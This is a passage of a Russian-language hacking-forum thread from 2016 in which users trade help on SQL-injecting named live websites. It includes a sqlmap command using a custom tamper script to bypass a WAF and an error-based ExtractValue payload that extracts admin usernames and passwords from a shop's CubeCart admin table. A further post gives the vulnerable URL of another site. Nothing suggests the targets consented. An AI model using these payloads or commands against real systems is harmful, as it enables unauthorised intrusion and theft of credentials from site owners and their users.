ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.09.2016, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
pw0ned said:
↑
--tamper=name
не легче оставить ссылку на ресурс ? в лс глянь
|
|
|
|
03.09.2016, 15:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
pw0ned said:
↑
--tamper=name
не легче оставить ссылку на ресурс ? А на счёт тампера я сделал так --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init __.py файл подписал инпут расширение поставил внутрь засунул скрипт но идёт ошибка
Код:
Code:
[13:58:10] [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script 'C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py'
А вод полный запрос
Код:
Code:
sqlmap -u www.site.ru/ --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py --dbs
|
|
|
|
03.09.2016, 17:24
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от BabaDook
BabaDook said:
↑
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1)+group+by+1,2,3,4,5,6+--+-&_a=viewCat_new[/COLOR][/COLOR]
допустим реально. Там W.A.F. Крутите.
Сообщение от r1l
r1l said:
↑
у меня два вопроса, я начинающий)
Что значит waf?
крутить так же --dbms=MySQL ? _ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select( concat(username,0x3a,password))from(CubeCart_admin _users)limit+0,1))))
|
|
|
03.09.2016, 17:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
4609
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
_ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select( concat(username,0x3a,password))from(CubeCart_admin _users)limit+0,1)))) 
не фурычит
|
|
|
|
03.09.2016, 18:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от r1l
r1l said:
↑
не фурычит Попробуйте всё таки браузером обработать сылку
|
|
|
|
03.09.2016, 18:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
4609
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Попробуйте всё таки браузером обработать сылку еслиб я умел(
|
|
|
|
04.09.2016, 00:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
4609
Репутация:
0
|
|
очень много сайтов раскручивает подбором по символов, как с этим бороться?(
|
|
|
|
04.09.2016, 19:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от r1l
r1l said:
↑
очень много сайтов раскручивает подбором по символов, как с этим бороться?( Видимо никто не понял вопроса.. Я в том числе
|
|
|
|
04.09.2016, 22:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
4609
Репутация:
0
|
|
хелп
не раскручивает(
крутил как --dbms=MySQL --level=5 --risk=3 --random-agent
уязвимость точно есть, но не могу раскрутить(
Код:
Code:
http://www.fckladionica.com:80/allnews.php?page=%5c&rc=497
|
|
|
|
04.09.2016, 22:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от pw0ned
pw0ned said:
↑
Видимо никто не понял вопроса.. Я в том числе Он имеет введу слепую иньекцию
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
